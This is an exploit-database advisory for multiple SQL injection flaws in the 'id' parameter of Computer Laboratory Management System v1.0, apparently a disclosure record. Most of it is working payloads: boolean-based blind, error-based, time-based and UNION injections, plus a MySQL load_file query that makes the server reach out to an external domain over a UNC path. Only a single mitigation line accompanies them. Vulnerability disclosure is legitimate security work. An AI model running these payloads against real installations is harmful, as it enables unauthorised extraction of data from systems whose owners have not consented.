Computer Laboratory Management System v1.0 - Multiple-SQL Injection

vendor:

Computer Laboratory Management System

by:

nu11secur1ty

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Computer Laboratory Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2024

Computer Laboratory Management System v1.0 – Multiple-SQL Injection

The 'id' parameter of Computer Laboratory Management System v1.0 is prone to SQL injection attacks. By injecting a payload that includes a sub-query to MySQL's load_file function with a UNC file path pointing to an external domain, an attacker can execute malicious SQL queries and retrieve sensitive information from the system.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to sanitize user inputs and prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi
# Author: nu11secur1ty
# Date: 03/28/2024
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400
# Reference: https://portswigger.net/web-security/sql-injection

# Description:
The id parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
was submitted in the id parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker can get all information from the system by
using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN
(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: page=user/manage_user&id=7''' AND (SELECT 1734
FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM
(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: page=user/manage_user&id=-2854' UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
---